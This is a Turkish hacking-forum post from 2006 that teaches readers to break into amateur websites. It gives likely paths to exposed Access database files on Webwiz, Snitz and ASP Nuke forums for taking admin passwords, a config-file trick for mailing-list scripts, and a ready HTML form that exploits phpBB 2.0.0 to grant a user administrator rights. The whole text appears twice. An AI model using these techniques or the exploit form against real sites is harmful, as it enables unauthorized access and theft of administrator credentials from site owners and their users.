SUSKUN
03-18-2006, 09:35 PM
Genelde baslicalari amatör olmak üzere bircok sitede güvenlik aciklari bulabilirsiniz.Özellikle hazir asp uyelik sistemi
kullanan siteleri,mesaj boardlarini ve forumlari bu aciklar yardimiyla hackleyebilirsiniz.
Ornek olarak Webwiz forumlarini ele alalim:
[Only Registered Users Can See Links] ([Only Registered Users Can See Links]) olarak deneyin.Eger ana database e ulasirsaniz ki eger forum yeni kurulmussa
bu fazlasiyla mümkün,gerekli sifreleri alabilirsiniz(admin şifrelerini).(sifreleri acmak icin access kullanabilirsiniz)
Snitz forumlarda da ayni islem mümkün.Mdb ye
[Only Registered Users Can See Links] ([Only Registered Users Can See Links]) adresinden ulasabilirsiniz.
son olarak asp nuke sistemlerde
[Only Registered Users Can See Links] ([Only Registered Users Can See Links]) den database'e ulasabilirsiniz.
Söyledigim gibi sitede hazir üyelik portali kullaniliyor olabilir;
bunlari aspindir.com dan bakin.Eger aynisi kullanilan bir portal görürseniz portalin upload edilmeden önceki klasör yoluna
bakin.Böylece mdb nin nerede oldugunu bulabilirsiniz.Büyük ihtimalle bunlar
/db/main.mdb
/db/uyeler.mdb
/db/members.mdb
/db/sifreler.mdb gibi
Bir sitedeki sizin bulamadiginiz muhtemel aciklari tespit edebilmek icin güvenlik tarayicilarini kullanmanizi öneririm.
Bu tarayicilardan en yaygin olanlari
.N-Stealth
.Whisker
.Retina
.t[Only Registered Users Can See Links]
.m3hm3t's CGI scanner'dır.
Php Sistemlerinin aciklari:
Size maillistlerdeki maillist acigini kullanabiliriz.Herhangi bir sitede bulunan maillist linkinin sonuna
/ml_config.dat ekLeyerek admin şifresine uLaşabiLirsiniz.
bi de örnek olsun die artik kalmayan php2.0.0 forumlarindan bir acik vermek istiyorum.Özellikle aciklarin mantigini
anlamaniza yardimci olacagina inaniyorum.
<form method="post" action="[Only Registered Users Can See Links] sayfası/admin/admin_ug_auth.php">
<p>User Level : <select name="userlevel">
<option value="admin" selected="selected">Administrator</option>
<option value="user">User</option>
</select></p>
<input type="hidden" name="private[1]" value="0" />
<input type="hidden" name="moderator[1]" value="0" />
<input type="hidden" name="mode" value="user" />
<input type="hidden" name="adv" value="" />
User ID: <input type="text" name="u" size="5"> <BR>
<input type="submit" name="submit" value="Submit" class="mainoption" />
<input type="reset" value="Reset" class="liteoption" name="reset" />
</form>
</body>
</html>
kullanan siteleri,mesaj boardlarini ve forumlari bu aciklar yardimiyla hackleyebilirsiniz.
Ornek olarak Webwiz forumlarini ele alalim:
[Only Registered Users Can See Links] ([Only Registered Users Can See Links]) olarak deneyin.Eger ana database e ulasirsaniz ki eger forum yeni kurulmussa
bu fazlasiyla mümkün,gerekli sifreleri alabilirsiniz(admin şifrelerini).(sifreleri acmak icin access kullanabilirsiniz)
Snitz forumlarda da ayni islem mümkün.Mdb ye
[Only Registered Users Can See Links] ([Only Registered Users Can See Links]) adresinden ulasabilirsiniz.
son olarak asp nuke sistemlerde
[Only Registered Users Can See Links] ([Only Registered Users Can See Links]) den database'e ulasabilirsiniz.
Söyledigim gibi sitede hazir üyelik portali kullaniliyor olabilir;
bunlari aspindir.com dan bakin.Eger aynisi kullanilan bir portal görürseniz portalin upload edilmeden önceki klasör yoluna
bakin.Böylece mdb nin nerede oldugunu bulabilirsiniz.Büyük ihtimalle bunlar
/db/main.mdb
/db/uyeler.mdb
/db/members.mdb
/db/sifreler.mdb gibi
Bir sitedeki sizin bulamadiginiz muhtemel aciklari tespit edebilmek icin güvenlik tarayicilarini kullanmanizi öneririm.
Bu tarayicilardan en yaygin olanlari
.N-Stealth
.Whisker
.Retina
.t[Only Registered Users Can See Links]
.m3hm3t's CGI scanner'dır.
Php Sistemlerinin aciklari:
Size maillistlerdeki maillist acigini kullanabiliriz.Herhangi bir sitede bulunan maillist linkinin sonuna
/ml_config.dat ekLeyerek admin şifresine uLaşabiLirsiniz.
bi de örnek olsun die artik kalmayan php2.0.0 forumlarindan bir acik vermek istiyorum.Özellikle aciklarin mantigini
anlamaniza yardimci olacagina inaniyorum.
<form method="post" action="[Only Registered Users Can See Links] sayfası/admin/admin_ug_auth.php">
<p>User Level : <select name="userlevel">
<option value="admin" selected="selected">Administrator</option>
<option value="user">User</option>
</select></p>
<input type="hidden" name="private[1]" value="0" />
<input type="hidden" name="moderator[1]" value="0" />
<input type="hidden" name="mode" value="user" />
<input type="hidden" name="adv" value="" />
User ID: <input type="text" name="u" size="5"> <BR>
<input type="submit" name="submit" value="Submit" class="mainoption" />
<input type="reset" value="Reset" class="liteoption" name="reset" />
</form>
</body>
</html>